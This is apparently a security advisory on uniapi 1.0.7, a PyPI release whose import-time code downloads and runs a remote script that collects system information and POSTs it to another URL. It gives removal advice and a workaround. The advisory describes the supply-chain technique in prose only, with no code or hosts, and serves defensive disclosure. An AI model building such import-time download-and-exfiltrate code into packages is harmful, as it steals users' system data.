Name of the Vulnerable Software and Affected Versions: uniapi version 1.0.7

Description: The issue concerns code introduced in uniapi version 1.0.7 that executes upon import of the module. This code downloads a script from a remote URL and then runs the downloaded script in a thread, which harvests system information. The harvested information is then sent to another remote URL using the POST method. This malicious code was found in the PyPI release artifacts but was not present in the public GitHub repository.

Recommendations: For uniapi version 1.0.7, consider removing or uninstalling this version to prevent the execution of the malicious code. As a temporary workaround, consider restricting network access to prevent the downloaded script from sending system information to remote URLs. Avoid using uniapi version 1.0.7 until a safe version is available.